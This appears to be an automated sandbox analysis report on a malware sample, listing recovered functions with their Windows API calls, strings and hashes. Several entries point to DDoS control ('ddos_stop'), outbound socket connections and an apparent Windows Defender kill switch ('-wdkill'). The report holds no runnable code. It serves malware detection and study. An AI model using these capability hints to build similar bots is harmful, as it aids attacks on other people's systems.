                            • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                            • API String ID: 1696903463-4081904993
                            • Opcode ID: 40e75e47dbdacb430a95b0c43cbe7cff051da99701a9626d5ec52735a88934a0
                            • Instruction ID: 541d9324fba16dbb128df455bd45aacc064f521391c7b7f941088558b1f4484e
                            • Opcode Fuzzy Hash: 40e75e47dbdacb430a95b0c43cbe7cff051da99701a9626d5ec52735a88934a0
                            • Instruction Fuzzy Hash: 3E519571C05298AEEF50EBA9D841BEDBBF4AF95300F1040AEE518F7282DB741E44DB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$DeallocateH_prolog__onexitstd::_
                            • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                            • API String ID: 1696903463-4081904993
                            • Opcode ID: cd3772b007e2e3605034e7384b8f6e1ed791610d58832108830bd4f07e3c60ee
                            • Instruction ID: cedfa38532cc3c87211090a3ce261768bfbfd649fecbc882319574a78002f880
                            • Opcode Fuzzy Hash: cd3772b007e2e3605034e7384b8f6e1ed791610d58832108830bd4f07e3c60ee
                            • Instruction Fuzzy Hash: 93517671C05298AEEB50EBA5D8417EDBBF4AF55300F1080AEE519F7282DA741F44CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$DeallocateH_prolog__onexitstd::_
                            • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                            • API String ID: 1696903463-4081904993
                            • Opcode ID: d69e1884139fa0826622fd73ff69086d486a5b5cd42b705f9d9cc20b701e6a36
                            • Instruction ID: 4d2ba738191a77f09488d5e29782d35add50baeb1bf84f2c720dbd8f47036253
                            • Opcode Fuzzy Hash: d69e1884139fa0826622fd73ff69086d486a5b5cd42b705f9d9cc20b701e6a36
                            • Instruction Fuzzy Hash: 60517571C05298AEEF50EBA9D841BEDBBF4AF55310F1040AEE518F7282DA741F44CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$DeallocateH_prolog__onexitstd::_
                            • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                            • API String ID: 1696903463-4081904993
                            • Opcode ID: c0f530f9b8b04e4d81636107d62a78154735764b4faa06a75b8f874c7da1aa36
                            • Instruction ID: 0b10c994a98373b41a76bcbfd873894fa1b253c0060d470191d0c7fac13e59e7
                            • Opcode Fuzzy Hash: c0f530f9b8b04e4d81636107d62a78154735764b4faa06a75b8f874c7da1aa36
                            • Instruction Fuzzy Hash: DD518571C05298AEEF50EBA9D841BEDBBF4AF55310F1040AEE518F7282DA781F44CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$DeallocateH_prolog__onexitstd::_
                            • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                            • API String ID: 1696903463-4081904993
                            • Opcode ID: 8c6fbcf32a1802c163c37b99494cf58d4dadafcc0565b78fb29883f966cc291a
                            • Instruction ID: a58e6ca50c14e4df1fe0a63d90d4e3dd48b6d296f92a12d3b382b13a8f03c481
                            • Opcode Fuzzy Hash: 8c6fbcf32a1802c163c37b99494cf58d4dadafcc0565b78fb29883f966cc291a
                            • Instruction Fuzzy Hash: 50518671C05298AEEF50EBA9D8417EDBBF4EF55300F1040AEE519F7282DA781E44CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$DeallocateH_prolog__onexitstd::_
                            • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                            • API String ID: 1696903463-4081904993
                            • Opcode ID: 2616132cbb5c9779b27f37327db9aac9d1065733a6bf9ca4187c8b58f661f652
                            • Instruction ID: acc281ffcd21c27be5a3eea3ee8e6ceb945bb9388b6689746376e60f724206a8
                            • Opcode Fuzzy Hash: 2616132cbb5c9779b27f37327db9aac9d1065733a6bf9ca4187c8b58f661f652
                            • Instruction Fuzzy Hash: 1B518570C05298AEEF50EBA9D8417EDBBF4AF55310F1080AEE519F7282DB741E44CB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,000000D9,?,?), ref: 0069F7D0
                            • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,000000D9,?,?), ref: 0069F7F3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Module$FileHandleName
                            • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program:
                            • API String ID: 4146042529-1508414584
                            • Opcode ID: 7b80eba7eeabd7178fc21f26241d7c372d682fef6f3091b7ea3d7901d9383376
                            • Instruction ID: f46707ea6c946a8ab2291f218ae75ddb0baf0e08649000f720efd0b6707dd3e3
                            • Opcode Fuzzy Hash: 7b80eba7eeabd7178fc21f26241d7c372d682fef6f3091b7ea3d7901d9383376
                            • Instruction Fuzzy Hash: A3D1F4B1A4010DAADF24AB259D85BFB736EEF64704F0541B8EC09D2641F734DE818F65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 006B35F2
                              • Part of subcall function 006B294C: _free.LIBCMT ref: 006B2969
                              • Part of subcall function 006B294C: _free.LIBCMT ref: 006B297B
                              • Part of subcall function 006B294C: _free.LIBCMT ref: 006B298D
                              • Part of subcall function 006B294C: _free.LIBCMT ref: 006B299F
                              • Part of subcall function 006B294C: _free.LIBCMT ref: 006B29B1
                              • Part of subcall function 006B294C: _free.LIBCMT ref: 006B29C3
                              • Part of subcall function 006B294C: _free.LIBCMT ref: 006B29D5
                              • Part of subcall function 006B294C: _free.LIBCMT ref: 006B29E7
                              • Part of subcall function 006B294C: _free.LIBCMT ref: 006B29F9
                              • Part of subcall function 006B294C: _free.LIBCMT ref: 006B2A0B
                              • Part of subcall function 006B294C: _free.LIBCMT ref: 006B2A1D
                              • Part of subcall function 006B294C: _free.LIBCMT ref: 006B2A2F
                              • Part of subcall function 006B294C: _free.LIBCMT ref: 006B2A41
                            • _free.LIBCMT ref: 006B35E7
                              • Part of subcall function 006A071F: RtlFreeHeap.NTDLL(00000000,00000000,?,006B30B9,?,00000000,?,00000000,?,006B335D,?,00000007,?,?,006B3746,?), ref: 006A0735
                              • Part of subcall function 006A071F: GetLastError.KERNEL32(?,?,006B30B9,?,00000000,?,00000000,?,006B335D,?,00000007,?,?,006B3746,?,?), ref: 006A0747
                            • _free.LIBCMT ref: 006B3609
                            • _free.LIBCMT ref: 006B361E
                            • _free.LIBCMT ref: 006B3629
                            • _free.LIBCMT ref: 006B364B
                            • _free.LIBCMT ref: 006B365E
                            • _free.LIBCMT ref: 006B366C
                            • _free.LIBCMT ref: 006B3677
                            • _free.LIBCMT ref: 006B36AF
                            • _free.LIBCMT ref: 006B36B6
                            • _free.LIBCMT ref: 006B36D3
                            • _free.LIBCMT ref: 006B36EB
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: 2b75e039e0b39f776c92bd762f7d21cfaeff1da4be197f2229d4f34e92bd172b
                            • Instruction ID: 30f4044870023e86c0627b08cd35f893ab27d886ae8d4ed0a4237555938979c7
                            • Opcode Fuzzy Hash: 2b75e039e0b39f776c92bd762f7d21cfaeff1da4be197f2229d4f34e92bd172b
                            • Instruction Fuzzy Hash: CD314CB1600615AFEB60AA39D855BD673EAAF01310F20442DE559DB3A1EF30EE948F24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004183ED
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 004183F8
                            • gethostbyname.WS2_32(?), ref: 0041842F
                            • htons.WS2_32(00000000), ref: 00418565
                            • socket.WS2_32(00000002,00000001,00000006), ref: 00418618
                            • connect.WS2_32(00000000,?,00000010), ref: 00418633
                            • closesocket.WS2_32(00000000), ref: 00418745
                              • Part of subcall function 0041CECB: __Thrd_sleep.LIBCPMT ref: 0041CF5E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionException@8H_prologRaiseThrd_sleepThrowclosesocketconnectgethostbynamehtonssocket
                            • String ID: %$A$GET /$d
                            • API String ID: 3725675640-1435572508
                            • Opcode ID: 6675a76d7843921700aa30594a4f3458998e593b32edcfe262d4075c8e01cfb9
                            • Instruction ID: 8619baa90a74c0ca68f1c9847fdf6309a755cb345366d807b23a94a538fc79da
                            • Opcode Fuzzy Hash: 6675a76d7843921700aa30594a4f3458998e593b32edcfe262d4075c8e01cfb9
                            • Instruction Fuzzy Hash: 13D1E07190064CDEDB01DFA8DC81BEEBBB8FF59304F10816EE505A71A1EB785A84CB55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004BB38D
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004BB550
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • std::exception::exception.LIBCONCRT ref: 004BB55F
                            • std::exception::exception.LIBCONCRT ref: 004BB58D
                            • std::exception::exception.LIBCONCRT ref: 004BB51F
                              • Part of subcall function 0040F2EC: ___std_exception_copy.LIBVCRUNTIME ref: 0040F313
                            • std::exception::exception.LIBCONCRT ref: 004BB5B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$ExceptionException@8H_prologRaiseThrow___std_exception_copy
                            • String ID: 4s$attribute && !attribute->parent()$expected ' or "$expected =$expected attribute name
                            • API String ID: 4183761955-1787543433
                            • Opcode ID: e206aa80c2eab8b8878550c8d9e863e126b9cd75c905938bc5f91daac5c78890
                            • Instruction ID: 9082df67099e57361299c8897f934f8f1a7be3fa6ed442b609c97e58f728c1bd
                            • Opcode Fuzzy Hash: e206aa80c2eab8b8878550c8d9e863e126b9cd75c905938bc5f91daac5c78890
                            • Instruction Fuzzy Hash: 93716DB09052459FDB24CF69C0907EABBF0FF19314F24419ED4959B382C3B99A06CBA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$H_prolog
                            • String ID: &amp;$&apos;$&gt;$&lt;$&quot;
                            • API String ID: 1011152186-87953025
                            • Opcode ID: 8b6acdbd1884c433e3eb66d662ecdef28774b3af9032a18d651404461fcea395
                            • Instruction ID: 60619a5e735b1dd61f3ca2b27c7cec5e4ab35684f43ef6a573e82dac1bf29305
                            • Opcode Fuzzy Hash: 8b6acdbd1884c433e3eb66d662ecdef28774b3af9032a18d651404461fcea395
                            • Instruction Fuzzy Hash: D741E571A00604BEE715DFBCCA9566EB7B8FB11700F50025FE401B3692E7B85E81C75A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00418010
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 0041801B
                            • socket.WS2_32(00000002,00000002,00000011), ref: 0041804B
                            • WSAStartup.WS2_32(00000101,?), ref: 00418062
                            • gethostbyname.WS2_32(?), ref: 00418121
                            • htons.WS2_32(00000000), ref: 00418296
                            • closesocket.WS2_32(00000000), ref: 0041836C
                              • Part of subcall function 0044E381: __EH_prolog.LIBCMT ref: 0044E386
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$DeallocateExceptionException@8RaiseStartupThrowclosesocketgethostbynamehtonssocketstd::_
                            • String ID: Active$ddos_stop$h
                            • API String ID: 3743251553-2142136108
                            • Opcode ID: 0a87d086086ba9b5432f135244961fe1045880785749232516b012fd462c22f1
                            • Instruction ID: de7d4fac30d88718c9cfa24d6dd51cf25e670066548554b16bac75a5c4634514
                            • Opcode Fuzzy Hash: 0a87d086086ba9b5432f135244961fe1045880785749232516b012fd462c22f1
                            • Instruction Fuzzy Hash: 90A1D071900248EEDB11DFB9CC46BED7BB8EF15304F10816EF505A7292EB785A84CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,006AEB26,00422A2B), ref: 006AC1CB
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: DecodePointer
                            • String ID: &j+*B$0A$acos$asin$exp$log$log10$pow$sqrt
                            • API String ID: 3527080286-1952416337
                            • Opcode ID: b1498f812940c7db842295f5c54563209ee7a2567a21828b34bcb296b9742395
                            • Instruction ID: b357d7ce9e5ce8eb6c6d449c601a788c08307e782ee0f65c8484335bdf4d4de5
                            • Opcode Fuzzy Hash: b1498f812940c7db842295f5c54563209ee7a2567a21828b34bcb296b9742395
                            • Instruction Fuzzy Hash: 535160B0904609CBCF14EFA8D9485ECBBB2FF4A324F248199D441A7354CB768E648F69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$Deallocate__onexitstd::_
                            • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                            • API String ID: 2266438879-1924342159
                            • Opcode ID: da39afb321ebb5b79a46acd6f49262403dbd32085b12eb1d6de3e4bdc9958aaa
                            • Instruction ID: e3f6e4ed26c1171030c5f62641186f8f80774c7b3595355818da57d0c299be82
                            • Opcode Fuzzy Hash: da39afb321ebb5b79a46acd6f49262403dbd32085b12eb1d6de3e4bdc9958aaa
                            • Instruction Fuzzy Hash: 77518870C05298DEDF54DBA9D8417EDBBF4AF55300F2080AEE519F7282DA781E44CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004149A7
                            • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,00000000,00000000), ref: 00414A2A
                            • VerifyVersionInfoW.KERNEL32(?,00000002,00000000), ref: 00414A3B
                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,?,00000000,00000000), ref: 00414A91
                            • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 00414A9E
                              • Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F
                            • new.LIBCMT ref: 00414ADD
                            • new.LIBCMT ref: 00414AF6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$CompletionConditionCreateErrorInfoLastMaskPortVerifyVersion
                            • String ID: IKA$iocp$yFA
                            • API String ID: 1196141489-2608038400
                            • Opcode ID: 4986c1491a2db2f7b8d9f1aa5ba03b7600fcac1162b12af0b918ebf57e0b935a
                            • Instruction ID: 1be28db19f12501b6fb4aff77f28c7ab733547099b558ec7f059dc77d5376b3d
                            • Opcode Fuzzy Hash: 4986c1491a2db2f7b8d9f1aa5ba03b7600fcac1162b12af0b918ebf57e0b935a
                            • Instruction Fuzzy Hash: EA51BCB1804384DFDB14CF69C88579EBFF4AF55310F1081AEE8489B392C3B88A44CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0042A637
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 0042A642
                              • Part of subcall function 0044E381: __EH_prolog.LIBCMT ref: 0044E386
                              • Part of subcall function 00461060: __EH_prolog.LIBCMT ref: 00461065
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                            • GetLastError.KERNEL32 ref: 0042A777
                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042A7A1
                              • Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Deallocatestd::_$ErrorExceptionException@8LastMessageRaiseThrow
                            • String ID: 0$7nY$Messages$_nY$snY
                            • API String ID: 2333877577-357471530
                            • Opcode ID: 400b5e496e04c46f8c64405badfcbb78ac8e694ade526f618433924302001305
                            • Instruction ID: 9da7b96ff621f32f9069ae91d5d81b3fab937ab502c573aa5ef8c35d28737e4a
                            • Opcode Fuzzy Hash: 400b5e496e04c46f8c64405badfcbb78ac8e694ade526f618433924302001305
                            • Instruction Fuzzy Hash: E2518EB1D0025CAEEB20DFA5DC84BEEBBBDEB44304F14406AF504A7281CBB85E058B64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00415038
                            • EnterCriticalSection.KERNEL32(?,76C865A0,?,00000000), ref: 00415061
                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 004150C3
                            • SetLastError.KERNEL32(00000000,76C865A0,?,00000000), ref: 004150D5
                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,?,?,00000000), ref: 004150ED
                            • GetLastError.KERNEL32(?,00000000), ref: 004150F6
                            • __ExceptionPtrCopy.LIBCPMT ref: 004151B2
                            • __ExceptionPtrCopy.LIBCPMT ref: 004151C3
                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00415241
                            • GetLastError.KERNEL32(?,00000000), ref: 0041524B
                              • Part of subcall function 00414F2A: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 00414F51
                              • Part of subcall function 00414F2A: GetLastError.KERNEL32 ref: 00414F5B
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$CompletionQueuedStatus$CopyCriticalExceptionPostSection$EnterH_prologLeave
                            • String ID:
                            • API String ID: 4011970719-0
                            • Opcode ID: 55e090ddf1c9b92d45048a01d25a9e272ec8599fe88ab40c7b02e9ae99173a20
                            • Instruction ID: 34897399caa75640775a5bbacf9fec6c5dd6c2ccf09fc9a0a4bf3d95f6a717ac
                            • Opcode Fuzzy Hash: 55e090ddf1c9b92d45048a01d25a9e272ec8599fe88ab40c7b02e9ae99173a20
                            • Instruction Fuzzy Hash: 59917971D00619DFCF15DFA4C840AEEBBB5FF88310B14846AE816EB241D7789A46CFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004300AD
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 004300B8
                              • Part of subcall function 0044DE59: __EH_prolog.LIBCMT ref: 0044DE5E
                              • Part of subcall function 0044DE59: new.LIBCMT ref: 0044DE84
                              • Part of subcall function 0044DE59: GetModuleHandleA.KERNEL32(?,?,?,?,00000000), ref: 0044DEEB
                              • Part of subcall function 0044DE59: GetProcAddress.KERNEL32(?,?), ref: 0044DF6C
                            • GetCurrentProcess.KERNEL32(00020008,?,?,?,00000000), ref: 004300EA
                            • OpenProcessToken.ADVAPI32(00000000,?,?,00000000), ref: 004300F1
                            • GetTokenInformation.ADVAPI32(?,00000012(TokenIntegrityLevel),?,00000004,?,?,?,00000000), ref: 00430106
                            • Wow64DisableWow64FsRedirection.KERNEL32(00000002,?,?,00000000), ref: 00430141
                              • Part of subcall function 00461060: __EH_prolog.LIBCMT ref: 00461065
                              • Part of subcall function 004317E2: __EH_prolog.LIBCMT ref: 004317E7
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                              • Part of subcall function 00461060: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004610E6
                              • Part of subcall function 00461060: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000), ref: 0046111C
                              • Part of subcall function 004312CA: __EH_prolog.LIBCMT ref: 004312CF
                              • Part of subcall function 00476C03: __EH_prolog.LIBCMT ref: 00476C08
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$ByteCharMultiProcessTokenWideWow64$AddressCurrentDeallocateDisableExceptionException@8HandleInformationModuleOpenProcRaiseRedirectionThrowstd::_
                            • String ID: -wdkill$Open
                            • API String ID: 1268642766-108266240
                            • Opcode ID: f2821a02c80ec9492e35222d7b195b66f57346d4ee833a9537cb1f3a97ad17d5
                            • Instruction ID: 41ee8f846fb54aecf92d047f2ac0e9fdf6e396cd655f5395e0a14007bb8153d2
                            • Opcode Fuzzy Hash: f2821a02c80ec9492e35222d7b195b66f57346d4ee833a9537cb1f3a97ad17d5
                            • Instruction Fuzzy Hash: 93D14B71D04248EEDB14EBA9CD92BEDBBB4AF65304F1041DEE406A7182DB781F44CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004282C1
                            • new.LIBCMT ref: 004282DF
                              • Part of subcall function 004A4399: __EH_prolog.LIBCMT ref: 004A439E
                              • Part of subcall function 004B1281: __EH_prolog.LIBCMT ref: 004B1286
                              • Part of subcall function 004B1281: std::exception::exception.LIBCONCRT ref: 004B1345
                              • Part of subcall function 004B1281: __CxxThrowException@8.LIBVCRUNTIME ref: 004B1372
                              • Part of subcall function 004A4514: __EH_prolog.LIBCMT ref: 004A4519
                              • Part of subcall function 004A4514: new.LIBCMT ref: 004A4566
                              • Part of subcall function 004A4867: __EH_prolog.LIBCMT ref: 004A486C
                            • _strlen.LIBCMT ref: 0042845C
                              • Part of subcall function 00460E77: __EH_prolog.LIBCMT ref: 00460E7C
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$DeallocateException@8Throw_strlenstd::_std::exception::exception
                            • String ID: allocator_${"xml":{"block":[{${"xml":{"block":{$}]}}$}}}
                            • API String ID: 1519558710-3049038541
